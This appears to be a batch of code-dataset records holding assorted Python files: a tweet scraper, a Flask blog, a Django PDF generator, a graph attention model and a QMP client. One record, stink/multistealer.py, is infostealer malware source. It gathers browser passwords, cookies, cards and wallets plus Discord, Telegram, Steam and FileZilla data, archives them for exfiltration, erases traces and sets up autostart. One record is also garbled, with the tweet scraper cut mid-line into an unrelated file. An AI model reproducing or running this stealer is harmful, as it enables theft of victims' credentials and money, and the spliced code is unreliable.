unittest.main()\n","sub_path":"tests/api/tweets/test_handlers.py","file_name":"test_handlers.py","file_ext":"py","file_size_in_byte":3594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"38767841","text":"import keys\nimport tweepy\nimport datetime\nimport time\nimport jsonpickle\n\ntime_start = time.time()\n#Authenticatie\nkey = keys.GetKeys()\nauth = tweepy.OAuthHandler(key.consumer, key.consumer_secret)\nauth.set_access_token(key.access_token, key.access_token_secret)\napi = tweepy.API(auth)\n\n#Hoeveel tweets worden opgeslagen per run\ndate_today = datetime.datetime.now() #datum van vandaag\ntweets_per_query = 100 #Meer mag niet van twitter\ntweets_max = 500 #Hoeveel tweets er totaal worden opgeslagen\nfile_name = 'tweets-'+ date_today.strftime('%d-%m-%y') +'.txt'\nsince_id = None\nmax_id = -1\ntweet_count = 0\nprint(\"Download begint nu...\")\n\n#Scraper gaat zoeken naar:\nsearch_query = \"#COVID19\"\nwith open(file_name,'w') as f:\n print(\"Tweets met \" + search_query + \" worden gedownload.\")\n while(tweet_count精确除法\n\ndef get_average(numbers):\n \"\"\"求平均数\"\"\"\n _numbers = []\n for num in numbers:\n if '.' in num:\n _numbers.append(float(num))\n else: _numbers.append(int(num))\n sumall = sum(_numbers)\n length = len(_numbers)\n return (sumall / length)\n\ndef is_num(num):\n \"\"\"是实数\"\"\"\n try:\n if '.' in num:\n float(num); return True\n else:\n int(num); return True\n except ValueError:\n return False\n\ndef boundary_right(num):\n \"\"\"边界正确, 在[-1000, 1000]区间中\"\"\"\n if '.' in num:\n return True if (float(num)>=-1000 and float(num)<=1000) else False;\n else: return True if (int(num)>=-1000 and int(num)<=1000) else False;\n\ndef point_right(num):\n \"\"\"\n 小数点精确位数正确,\n 最多精确到后2位\n \"\"\"\n if num.count(\".\") == 1:\n return True if len(num.split('.')[-1])<3 else False\n elif num.count(\".\") > 1:\n return False\n else: return True\n\ndef ilegal_or_legal(numbers):\n ilegal_numbers = []\n legal_numbers = []\n for num in numbers:\n if (is_num(num) and boundary_right(num) and point_right(num)):\n legal_numbers.append(num)\n else: ilegal_numbers.append(num)\n return {'ilegal':ilegal_numbers, 'legal': legal_numbers}\n \nif __name__ == '__main__':\n n = input()\n input_numbers = raw_input()\n numbers = input_numbers.split()\n ilegal_numbers = ilegal_or_legal(numbers).get('ilegal')\n legal_numbers = ilegal_or_legal(numbers).get('legal')\n for num in ilegal_numbers:\n print(\"ERROR: %s is not a legal number\" % num) \n if len(legal_numbers) != 0:\n print(\"The average of %s numbers is %.2f\" % \\\n (len(legal_numbers), get_average(legal_numbers)))\n else: print(\"The average of 0 numbers is Undefined\")\n","sub_path":"neo1054.py","file_name":"neo1054.py","file_ext":"py","file_size_in_byte":1904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"19157355","text":"from django.core.management.base import BaseCommand, CommandError\nfrom datetime import date\nfrom adra.models import Persona\nfrom mailmerge import MailMerge\nimport os\nfrom django.conf import settings\nfrom PyPDF2 import PdfFileReader, PdfFileWriter\nfrom PyPDF2.generic import BooleanObject, NameObject, IndirectObject\n\n\nclass Command(BaseCommand):\n\n def handle(self, *args, **options):\n\n def set_need_appearances_writer(writer):\n # See 12.7.2 and 7.7.2 for more information:\n # http://www.adobe.com/content/dam/acom/en/devnet/acrobat/pdfs/PDF32000_2008.pdf\n try:\n catalog = writer._root_object\n # get the AcroForm tree and add \"/NeedAppearances attribute\n if \"/AcroForm\" not in catalog:\n writer._root_object.update({\n NameObject(\"/AcroForm\"): IndirectObject(len(writer._objects), 0, writer)})\n\n need_appearances = NameObject(\"/NeedAppearances\")\n writer._root_object[\"/AcroForm\"][need_appearances] = BooleanObject(\n True)\n return writer\n\n except Exception as e:\n print('set_need_appearances_writer() catch : ', repr(e))\n return writer\n\n def calculate_age(age):\n today = date.today()\n return today.year - age.year - ((today.month, today.day) < (age.month, age.day))\n\n infile = file_path = os.path.join(settings.PROJECT_ROOT, 'entrega2020.pdf')\n inputStream = open(infile, \"rb\")\n pdf_reader = PdfFileReader(inputStream, strict=False)\n if \"/AcroForm\" in pdf_reader.trailer[\"/Root\"]:\n pdf_reader.trailer[\"/Root\"][\"/AcroForm\"].update(\n {NameObject(\"/NeedAppearances\"): BooleanObject(True)})\n\n pdf_writer = PdfFileWriter()\n set_need_appearances_writer(pdf_writer)\n if \"/AcroForm\" in pdf_writer._root_object:\n pdf_writer._root_object[\"/AcroForm\"].update(\n {NameObject(\"/NeedAppearances\"): BooleanObject(True)})\n\n # personas = Persona.objects.exclude(covid=True).exclude(active=False)\n personas = Persona.objects.filter(active=True).exclude(covid=True)\n # print([ p.nombre_apellido for p in personas])\n # print(personas.count())\n pdf_writer.addPage(pdf_reader.getPage(0))\n for persona in personas:\n if persona.active:\n print(persona.id)\n familiares = persona.hijo.all()\n familiares_gr = persona.hijo.filter(edad__gt=3)\n # print(familiares_pq.count())\n mayores = 0\n menores = 0\n for f in familiares:\n if calculate_age(f.fecha_nacimiento) > 3:\n mayores += 1\n else:\n menores += 1\n\n print(mayores)\n print(menores)\n field_dictionary = {\n \"NombreOAR\": \"ADRA TORREJON\",\n \"DireccioOAR\": \"C/ Primavera 15\",\n \"Nombre y apellidos del representante de la unidad familiar\": f\"{persona.nombre_apellido}\",\n \"DNINIEPasaporte 1\": f\"{persona.dni}\",\n \"Teléfono\": f\"{persona.telefono}\",\n \"Domicilio\": f\"{persona.domicilio}\",\n \"Localidad\": f\"{persona.ciudad}\",\n \"CP\": \"28850\",\n \"TOTAL MIEMBROS UNIDAD FAMILIAR\": f\"{mayores + menores + 1}\",\n \"Niños 02 ambos inclusive\": f\"{menores}\",\n \"numarAdra\": f\"{persona.numero_adra}\"\n }\n\n pdf_writer.updatePageFormFieldValues(\n pdf_writer.getPage(0), field_dictionary)\n\n # outputStream = open(outfile, \"wb\")\n # pdf_writer.write(outputStream)\n\n # outputStream.close()\n # pdf_writer.encrypt(str.lower(f\"{persona.numero_adra}\"))\n with open(f\"./entregas/{persona.numero_adra}.pdf\", \"wb\") as out_file:\n pdf_writer.write(out_file)\n\n\n # extractedPage = open(pdf_file_path, 'rb')\n # response = HttpResponse(content_type='application/pdf')\n # response['Content-Disposition'] = f'attachment;filename=\"{persona.numero_adra}.pdf\"'\n # pdf_writer.write(stream=f'./entregas/{persona.numero_adra}.pdf')\n # inputStream.close()\n","sub_path":"adra/management/commands/entrega_pdf.py","file_name":"entrega_pdf.py","file_ext":"py","file_size_in_byte":4497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"20910863","text":"#!/usr/bin/env python\n# coding: utf-8\n'''\nLast update: 21.07.21. KS.Kwon\n\n'''\n\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow import keras\n\nfrom .layer import GraphAttention, GraphAttention_mol, Dropout_layer, Output_layer\n\n\nclass GAT(keras.models.Model):\n max_poc_node = 100\n max_mol_node = 60\n\n def __init__(self, n_poc_feature, n_atom_feature, n_bond_feature, batch_size,\n W_poc_layer, b_poc_layer, W_poc_att_self, W_poc_att_neighbor,\n W_lig_layer, b_lig_layer, W_lig_att_self, W_lig_att_neighbor,\n W_inter, b_inter, W_out, b_out, **kwargs):\n super().__init__(**kwargs)\n\n self._hidden_features = [300, 200]\n\n self.Pocket_GAT1 = GraphAttention( \n max_poc_node=GAT.max_poc_node, \n n_feature=n_poc_feature, \n n_hidden=self._hidden_features[0],\n batch_size=batch_size,\n W_layer=W_poc_layer[0],\n b_layer=b_poc_layer[0],\n W_att_self=W_poc_att_self[0],\n W_att_neighbor=W_poc_att_neighbor[0]\n )\n self.Pocket_GAT2 = GraphAttention(\n max_poc_node=GAT.max_poc_node, \n n_feature=self._hidden_features[0] * 3, \n n_hidden=self._hidden_features[1],\n batch_size=batch_size,\n W_layer=W_poc_layer[1],\n b_layer=b_poc_layer[1],\n W_att_self=W_poc_att_self[1],\n W_att_neighbor=W_poc_att_neighbor[1]\n )\n self.Ligand_GAT1 = GraphAttention_mol(\n max_mol_node=GAT.max_mol_node, \n n_atom_feature=n_atom_feature,\n n_bond_feature=n_bond_feature,\n n_hidden=self._hidden_features[0], \n batch_size=batch_size,\n W_layer=W_lig_layer[0], \n b_layer=b_lig_layer[0],\n W_att_self=W_lig_att_self[0],\n W_att_neighbor=W_lig_att_neighbor[0]\n )\n self.Ligand_GAT2 = GraphAttention_mol(\n max_mol_node=GAT.max_mol_node, \n n_atom_feature=self._hidden_features[0] * 3,\n n_bond_feature=n_bond_feature,\n n_hidden=self._hidden_features[1],\n batch_size=batch_size,\n W_layer=W_lig_layer[1], \n b_layer=b_lig_layer[1],\n W_att_self=W_lig_att_self[1],\n W_att_neighbor=W_lig_att_neighbor[1],\n add_bond_feat=False\n )\n self.Interaction_layer = Dropout_layer(\n n_input=6*self._hidden_features[1],\n n_output=100, W=W_inter, b=b_inter\n )\n self.Output_layer = Output_layer(\n n_input=100, n_output=2, W=W_out, b=b_out\n )\n\n def call(self, inputs, training=False):\n M_poc_feature, M_poc_adj, poc_d_score, poc_mask, M_atom_feature, M_bond_feature, M_atom_adj, M_bond_adj, mol_mask = inputs\n\n M_poc_hidden1 = self.Pocket_GAT1(\n (M_poc_feature, M_poc_adj, poc_mask),\n training=training\n )\n M_poc_hidden2 = self.Pocket_GAT2(\n (M_poc_hidden1, M_poc_adj, poc_mask),\n training=training\n )\n\n M_lig_hidden1 = self.Ligand_GAT1(\n (M_atom_feature, M_bond_feature, M_atom_adj, M_bond_adj, mol_mask),\n training=training\n )\n M_lig_hidden2 = self.Ligand_GAT2(\n (M_lig_hidden1, M_bond_feature, M_atom_adj, M_bond_adj, mol_mask),\n training=training\n )\n\n poc_FP = self._convToFP(M_poc_hidden2, poc_mask)\n lig_FP = self._convToFP(M_lig_hidden2, mol_mask)\n\n inter_input = tf.concat([poc_FP, lig_FP], axis=1)\n inter_output = self.Interaction_layer(inter_input, training=training)\n class_score, class_prob, classification = self.Output_layer(inter_output)\n\n return class_score, class_prob, classification, inter_output, poc_FP, M_poc_hidden2, lig_FP, M_lig_hidden2\n \n def loss(self, inputs, labels): \n return tf.nn.softmax_cross_entropy_with_logits(labels=labels, logits=inputs)\n\n def _convToFP(self, matrix, mask):\n n = tf.reduce_sum(mask, axis=1)\n vector = tf.reduce_sum(matrix, axis=1)\n FP = vector / tf.expand_dims(n, axis=-1)\n\n return FP\n\n def get_params(self):\n W_poc_layer1, b_poc_layer1, W_poc_att_self1, W_poc_att_neighbor1 = self.Pocket_GAT1.get_params()\n W_poc_layer2, b_poc_layer2, W_poc_att_self2, W_poc_att_neighbor2 = self.Pocket_GAT2.get_params()\n \n W_lig_layer1, b_lig_layer1, W_lig_att_self1, W_lig_att_neighbor1 = self.Ligand_GAT1.get_params()\n W_lig_layer2, b_lig_layer2, W_lig_att_self2, W_lig_att_neighbor2 = self.Ligand_GAT2.get_params()\n\n return np.array([\n [W_poc_layer1, W_poc_layer2],\n [b_poc_layer1, b_poc_layer2],\n [W_poc_att_self1, W_poc_att_self2],\n [W_poc_att_neighbor1, W_poc_att_neighbor2],\n [W_lig_layer1, W_lig_layer2],\n [b_lig_layer1, b_lig_layer2],\n [W_lig_att_self1, W_lig_att_self2],\n [W_lig_att_neighbor1, W_lig_att_neighbor2],\n self.Interaction_layer.W, self.Interaction_layer.b,\n self.Output_layer.W, self.Output_layer.b\n ], dtype=object)\n","sub_path":"code/model/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"101860069","text":"from sys import argv\nfrom threading import Thread\nfrom multiprocessing import Pool\nfrom os import path, makedirs, remove\nfrom shutil import rmtree, make_archive\n\nfrom stink.helpers import functions\nfrom stink.enums import Features, Utils\nfrom stink.utils import Autostart, Message\nfrom stink.helpers.config import MultistealerConfig, Browsers\nfrom stink.modules import Chromium, Discord, FileZilla, Processes, Screenshot, System, Telegram, Steam\n\n\nclass Stealer(Thread):\n \"\"\"\n Collects and sends the specified data.\n \"\"\"\n\n def __init__(self, senders: list = [], features: list = [Features.all], utils: list = []):\n Thread.__init__(self, name=\"Stealer\")\n\n self.__senders = senders\n self.__errors = True if Utils.errors in utils else False\n self.__autostart = True if Utils.autostart in utils else False\n self.__message = True if Utils.message in utils else False\n\n self.__config = MultistealerConfig()\n\n browser_functions = [module for module in [\n Features.passwords,\n Features.cookies,\n Features.cards,\n Features.history,\n Features.bookmarks,\n Features.extensions,\n Features.wallets\n ] if module in features or Features.all in features]\n browser_statuses = True if len(browser_functions) > 0 else False\n\n self.__methods = [\n {\n \"object\": Chromium(\n Browsers.CHROME.value,\n self.__config.StoragePath,\n *self.__config.ChromePaths,\n browser_functions,\n self.__errors\n ),\n \"status\": browser_statuses\n },\n {\n \"object\": Chromium(\n Browsers.OPERA_GX.value,\n self.__config.StoragePath,\n *self.__config.OperaGXPaths,\n browser_functions,\n self.__errors\n ),\n \"status\": browser_statuses\n },\n {\n \"object\": Chromium(\n Browsers.OPERA_DEFAULT.value,\n self.__config.StoragePath,\n *self.__config.OperaDefaultPaths,\n browser_functions,\n self.__errors\n ),\n \"status\": browser_statuses\n },\n {\n \"object\": Chromium(\n Browsers.EDGE.value,\n self.__config.StoragePath,\n *self.__config.MicrosoftEdgePaths,\n browser_functions,\n self.__errors\n ),\n \"status\": browser_statuses\n },\n {\n \"object\": Chromium(\n Browsers.BRAVE.value,\n self.__config.StoragePath,\n *self.__config.BravePaths,\n browser_functions,\n self.__errors\n ),\n \"status\": browser_statuses\n },\n {\n \"object\": Chromium(\n Browsers.VIVALDI.value,\n self.__config.StoragePath,\n *self.__config.VivaldiPaths,\n browser_functions,\n self.__errors\n ),\n \"status\": browser_statuses\n },\n {\n \"object\": System(\n self.__config.StoragePath,\n \"System\",\n self.__errors\n ),\n \"status\": True if (Features.system in features or Features.all in features) else False\n },\n {\n \"object\": Processes(\n self.__config.StoragePath,\n \"System\",\n self.__errors\n ),\n \"status\": True if (Features.processes in features or Features.all in features) else False\n },\n {\n \"object\": Screenshot(\n self.__config.StoragePath,\n \"System\",\n self.__errors\n ),\n \"status\": True if (Features.screenshot in features or Features.all in features) else False\n },\n {\n \"object\": Discord(\n self.__config.StoragePath,\n r\"Programs\\Discord\",\n self.__errors\n ),\n \"status\": True if (Features.discord in features or Features.all in features) else False\n },\n {\n \"object\": Telegram(\n self.__config.StoragePath,\n r\"Programs\\Telegram\",\n self.__errors\n ),\n \"status\": True if (Features.telegram in features or Features.all in features) else False\n },\n {\n \"object\": FileZilla(\n self.__config.StoragePath,\n r\"Programs\\FileZilla\",\n self.__errors\n ),\n \"status\": True if (Features.filezilla in features or Features.all in features) else False\n },\n {\n \"object\": Steam(\n self.__config.StoragePath,\n r\"Programs\\Steam\",\n self.__errors\n ),\n \"status\": True if (Features.steam in features or Features.all in features) else False\n }\n ]\n\n def __create_storage(self) -> None:\n \"\"\"\n Creates storage for the Stink.\n :return: None\n \"\"\"\n if not path.exists(self.__config.StoragePath):\n makedirs(self.__config.StoragePath)\n else:\n rmtree(self.__config.StoragePath)\n makedirs(self.__config.StoragePath)\n\n def __create_archive(self) -> None:\n \"\"\"\n Creates a data archive.\n :return: None\n \"\"\"\n make_archive(rf\"{path.dirname(self.__config.StoragePath)}\\{self.__config.ZipName}\", \"zip\", self.__config.StoragePath)\n\n def __delete_files(self) -> None:\n \"\"\"\n Deletes the archive and storage.\n :return: None\n \"\"\"\n rmtree(self.__config.StoragePath)\n remove(rf\"{path.dirname(self.__config.StoragePath)}\\{self.__config.ZipName}.zip\")\n\n def run(self) -> None:\n \"\"\"\n Launches the Stink.\n :return: None\n \"\"\"\n try:\n\n self.__create_storage()\n\n with Pool(processes=self.__config.PoolSize) as pool:\n pool.map(functions.run_process, [\n method[\"object\"] for method in self.__methods if method[\"status\"] is True\n ])\n\n pool.close()\n\n self.__create_archive()\n\n for sender in self.__senders:\n sender.run(self.__config.ZipName, self.__config.StoragePath, self.__errors)\n\n self.__delete_files()\n\n if self.__autostart is True:\n Autostart(argv[0], self.__errors).run()\n\n if self.__message is True:\n Message(self.__errors).run()\n\n except Exception as e:\n if self.__errors is True: print(f\"[Multistealer]: {repr(e)}\")\n","sub_path":"stink/multistealer.py","file_name":"multistealer.py","file_ext":"py","file_size_in_byte":7326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"502162064","text":"# -*- coding: utf-8 -*-\n\n# Copyright 2015 Mirantis, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom fuel_bootstrap.commands import base\nfrom fuel_bootstrap.utils import bootstrap_image as bs_image\n\n\nclass ActivateCommand(base.BaseCommand):\n \"\"\"Activate specified bootstrap image.\"\"\"\n\n def get_parser(self, prog_name):\n parser = super(ActivateCommand, self).get_parser(prog_name)\n parser.add_argument(\n 'id',\n type=str,\n metavar='ID',\n help=\"ID of bootstrap image to be activated.\"\n )\n return parser\n\n def take_action(self, parsed_args):\n super(ActivateCommand, self).take_action(parsed_args)\n # cliff handles errors by itself\n image_uuid = bs_image.activate(parsed_args.id)\n self.app.stdout.write(\"Bootstrap image {0} has been activated.\\n\"\n .format(image_uuid))\n","sub_path":"contrib/fuel_bootstrap/fuel_bootstrap_cli/fuel_bootstrap/commands/activate.py","file_name":"activate.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"625150045","text":"var = []\ndef media(a,b,c):\n\tif ((a < b) and (a > c)) or ((a > b) and (a < c)):\n\t\tvar.append(a)\n\t\t#print(a)\n\telif ((b < a) and (b > c)) or ((b > a) and (b < c)):\n\t\tvar.append(b)\n\t\t#print(b)\n\telif ((c < a) and (c > b)) or ((c > a) and (c < b)):\n\t\tvar.append(c)\n\t\t#print(c)\n\nprint(\"ingrese\")\nentr = input()\nentr2 = int(entr)\n\nfor i in range(0,entr2):\n\tentr3 = input()\n\tentr4 = entr3.split()\n\tfor n in range(0, len(entr4)):\n\t\tentr4[n] = int(entr4[n])\n\tmedia(entr4[0],entr4[1],entr4[2])\n\nprint(*var, sep=' ')\n","sub_path":"python/media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"109000882","text":"from app import app, cachedb, logger\nfrom flask import render_template\nfrom app.searcher import Searcher\n\n\n@app.route('/')\ndef index():\n return render_template(\"index.html\")\n\n\n@app.route('/search/')\ndef search(name):\n logger.info(f\"搜索 : {name}\")\n result = Searcher.search(name)\n cachedb.clear() # 每次搜索前清空临时数据库\n result_json = []\n for video_list in result:\n cachedb.add_video_list(video_list) # 保存结果到临时数据库\n result_json.append(video_list.json())\n logger.info(f\"搜索结果: {len(result_json)} 条\")\n return render_template(\"result.html\", result=result_json)\n\n\n@app.route('/playlist/')\ndef get_playlist(list_hash):\n video_list = cachedb.get_video_list(list_hash)\n if not video_list:\n return '视频不存在'\n logger.info(f\"获取视频列表: {video_list.title} ({video_list.num}集) {video_list.hash}\")\n video_list_json = video_list.json()['videos']\n return render_template('playlist.html', video_list=video_list_json)\n\n\n@app.route('/video/')\ndef get_video(video_hash):\n video = cachedb.get_video(video_hash)\n handler = video.handler(video.raw_url, video.type)\n logger.info(f\"请求 : {video.name} {video.type}\")\n return handler.make_response()\n","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"605416215","text":"from flask import Flask, request, render_template, flash\nfrom flask_sqlalchemy import SQLAlchemy\nimport json\nimport app_config as config\n\n# Create Flask Application\napp = Flask(__name__, template_folder='templates')\napp.config.from_object(config)\n# Create database object\ndb = SQLAlchemy(app)\n\n\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\ndef index():\n from models import Post, Comment\n from forms import PostForm, CommentForm\n # Retrieve all posts from DB\n if request.method == 'GET':\n posts = Post.query.all()\n result = []\n for post in posts:\n # Retrieve comments that belong to this post\n comments = Comment.query.filter_by(post_id = post.id)\n result.append({\"post\": post, \"comments\": comments})\n # Render Blog template\n return render_template('index.html', data=result)\n # Creating post or comment\n elif request.method == \"POST\":\n # 'request_type' is 'post' or 'comment'\n request_type = request.form.get(\"request_type\")\n # Creating Post\n if request_type == \"post\":\n form = PostForm(request.form)\n if form.validate():\n post = Post(**form.data)\n db.session.add(post)\n db.session.commit()\n return \"Post saved\"\n else:\n return \"Erorr\", 400\n # Creating comment for post\n elif request_type == \"comment\":\n form = CommentForm(request.form)\n if form.validate():\n comment = Comment(**form.data)\n db.session.add(comment)\n db.session.commit()\n return \"Comment saved\"\n else:\n return \"Erorr\", 400\n else:\n return \"Wrong request type\", 400\n\nif __name__ == \"__main__\":\n from models import *\n db.create_all()\n app.run()","sub_path":"lesson14/imgbrd/imgbrd_app.py","file_name":"imgbrd_app.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"126410605","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: ./pilasengine/habilidades/eliminarse_si_sale_de_pantalla.py\n# Compiled at: 2016-08-25 20:52:02\nfrom pilasengine import habilidades\n\nclass EliminarseSiSaleDePantalla(habilidades.Habilidad):\n \"\"\"Se asegura de que el actor sea eliminado si sale de los\n bordes de la pantalla.\n \"\"\"\n\n def iniciar(self, receptor):\n u\"\"\"\n :param receptor: El actor que aprenderá la habilidad.\n \"\"\"\n super(EliminarseSiSaleDePantalla, self).iniciar(receptor)\n self.ancho, self.alto = self.pilas.obtener_area()\n self.camara = self.pilas.escena_actual().camara\n\n def actualizar(self):\n if self.receptor.derecha < -(self.ancho / 2) + self.camara.x:\n self.eliminar_actor()\n elif self.receptor.izquierda > self.ancho / 2 + self.camara.x:\n self.eliminar_actor()\n if self.receptor.abajo > self.alto / 2 + self.camara.y:\n self.eliminar_actor()\n elif self.receptor.arriba < -(self.alto / 2) + self.camara.y:\n self.eliminar_actor()\n\n def eliminar_actor(self):\n self.receptor.eliminar()","sub_path":"pycfiles/pilas-1.4.9.tar/eliminarse_si_sale_de_pantalla.py","file_name":"eliminarse_si_sale_de_pantalla.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"536187944","text":"# -*- coding: utf-8 -*-\n\nimport os\nd = os.path.dirname(os.path.abspath(__file__))\nd_cf = '/home/www/pyprojects/config/'\n\n# initiate thread-safe storage\nimport threading\n_local = threading.local()\ndef local(name):\n if not hasattr(_local, name):\n setattr(_local, name, {})\n return getattr(_local, name)\n\n# initiate config\nimport ConfigParser\ndef config(name='common'):\n _config = local('config')\n if name not in _config:\n _config[name] = ConfigParser.ConfigParser()\n _config[name].read([d + '/default/' + name + '.ini', d + '/' + name + '.ini', d_cf + name + '.ini'])\n return _config[name]","sub_path":"config/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"254745703","text":"import requests\nimport json\nfrom sqlalchemy import delete\nfrom db.sqlalchemydb import engine, locations_table\nfrom db.db_delete import deleteLocationData, deleteStationData\n\nprint('\\nBateria de testes\\n')\n## Creating location\ntry:\n url = 'http://127.0.0.1:5000/v1/premises'\n dados = {\"name\": 'GreenPeace',\n \"address\": 'Fradique Coutinho,352'\n }\n datajson = json.dumps(dados)\n answer = requests.post(url, json=dados)\n answer = json.loads(answer.text)\n print('[x]Location Created')\nexcept:\n print(\"[ ]Location Created\")\n\n## Creating Stations\ntry:\n url = 'http://127.0.0.1:5000/v1/stations'\n dados = {\"serial\": '123456',\n \"premise_id\": 111,\n \"name\": 'Umbrella Corp'\n }\n datajson = json.dumps(dados)\n answer = requests.post(url, json=dados)\n answer = json.loads(answer.text)\n print('[x]Station Created')\nexcept:\n print(\"[ ]Station Created\")\n\n## Getting location list\ntry:\n url = 'http://127.0.0.1:5000/v1/premises'\n answer = requests.get(url)\n print('[x]List of locations')\nexcept:\n print('[ ]List of locations')\n\n\n## Deleting created location\ntry:\n deleteLocationData('GreenPeace')\n deleteStationData('Umbrella Corp')\n print('[x]Test data deleted')\nexcept:\n print('[ ]Test data deleted')","sub_path":"teste_unitário.py","file_name":"teste_unitário.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"575591565","text":"# -*- coding: utf-8 -*-\nfrom plone.namedfile.utils import set_headers, stream_data\nfrom Products.CMFCore.utils import getToolByName\nfrom zope.component import getMultiAdapter\nfrom zope.publisher.interfaces import NotFound\n\nimport re\n\n\nclass VersionView(object):\n\n def __call__(self):\n version_id = self.request.version_id\n content_core_view = getMultiAdapter((self.context, self.request), name='content-core')\n html = content_core_view()\n return re.sub(\n r'''/@@download/(?P.*?)/(?P.*?)\"''',\n r'''/@@download-version?field_id=\\g&filename=\\g&version_id=''' + version_id + '\"',\n html\n )\n\n\nclass DownloadVersion(object):\n\n def __call__(self):\n version_id = self.request.version_id\n field_id = self.request.field_id\n filename = self.request.filename\n repository = getToolByName(self.context, 'portal_repository')\n old_obj = repository.retrieve(self.context, version_id).object\n file_ = getattr(old_obj, field_id)\n\n if file_ is None:\n raise NotFound(self, filename, self.request)\n\n set_headers(file_, self.request.response, filename=filename)\n\n return stream_data(file_)\n","sub_path":"buildout-cache--/eggs/plone.app.versioningbehavior-1.2.2-py2.7.egg/plone/app/versioningbehavior/browser.py","file_name":"browser.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"69799962","text":"from typing import List, Tuple\n\nfrom allennlp.common import JsonDict\nfrom allennlp.data import Instance\nfrom allennlp.data.dataset_readers.dataset_utils import bio_tags_to_spans\nfrom allennlp.predictors import Predictor\n\n\n@Predictor.register('smartdata-eventx-predictor')\nclass SmartdataEventxPredictor(Predictor):\n def _json_to_instance(self, json_dict: JsonDict) -> Instance:\n ner_tags = json_dict['ner_tags']\n trigger_spans, entity_spans = self._extract_trigger_and_entity_spans(ner_tags)\n return self._dataset_reader.text_to_instance(tokens=json_dict['tokens'],\n ner_tags=ner_tags,\n entity_spans=entity_spans,\n trigger_spans=trigger_spans)\n\n @staticmethod\n def _extract_trigger_and_entity_spans(ner_tags):\n entity_types_with_spans = bio_tags_to_spans(ner_tags)\n triggers_with_spans = [type_span\n for type_span in entity_types_with_spans\n if type_span[0].lower() == 'trigger']\n trigger_spans = SmartdataEventxPredictor._extract_exclusive_spans(triggers_with_spans)\n entity_spans = SmartdataEventxPredictor._extract_exclusive_spans(entity_types_with_spans)\n return trigger_spans, entity_spans\n\n @staticmethod\n def _extract_exclusive_spans(\n types_with_spans: List[Tuple[str, Tuple[int, int]]]\n ) -> List[Tuple[int, int]]:\n return [(t[1][0], t[1][1] + 1) for t in types_with_spans]\n\n","sub_path":"eventx/predictors/smartdata_predictor.py","file_name":"smartdata_predictor.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"294913642","text":"from turtle import *\n\ndef regularShape(n, size):\n\tfor x in range(n):\n\t\tforward(size)\n\t\tleft(360.0/n)\n\n\nclass Point(object):\n\tdef __init__(self, x, y):\n\t\tsuper(Point, self).__init__()\n\t\tself.x = x\n\t\tself.y = y\n\npoints = [\n\tPoint(50,20),\n\tPoint(50,40),\n\tPoint(0,-20),\n\tPoint(-10,-40),\n\tPoint(10,0),\n]\n\n# for x in range(len(points)):\n\t# setposition(points[x].x, points[x].y)\n\ndef main():\n\tspeed('fastest')\n\tregularShape(360,1)\n\nmain()\n\nraw_input()","sub_path":"draw.py","file_name":"draw.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"72512075","text":"# encoding: utf-8\n\nimport socket\nimport logging\nimport os\nimport json\nlogger = logging.getLogger('QMP')\n\nclass QMPError(Exception):\n pass\n\nclass QMPConnectionError(Exception):\n pass\n\nclass QMP(object):\n def __init__(self):\n self._connection = None\n\n def connect_socket(self, path):\n \"\"\"\n Connecto qmp socket\n \"\"\"\n\n s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)\n if os.path.exists(path):\n try:\n s.connect(path)\n # empty buffer and wait for hello\n s.recv(1024)\n self._connection=s\n return\n except socket.error as e:\n if e.errno == 98:\n raise QMPConnectionError(\"Cannot connect to virtual, \" +\n \"socket '%s' already on use\" % path)\n if e.errno == 111:\n raise QMPConnectionError(\"Cannot connect to virtual, \" +\n \"connection refused\")\n\n logger.exception(e)\n logger.error(\"Cannot open socket\")\n raise QMPConnectionError(\"Cannot connect to virtual, socket\" +\n \" '%s' unavailable\" % path)\n else:\n raise QMPConnectionError(\"Cannot connect to virtual, socket\" 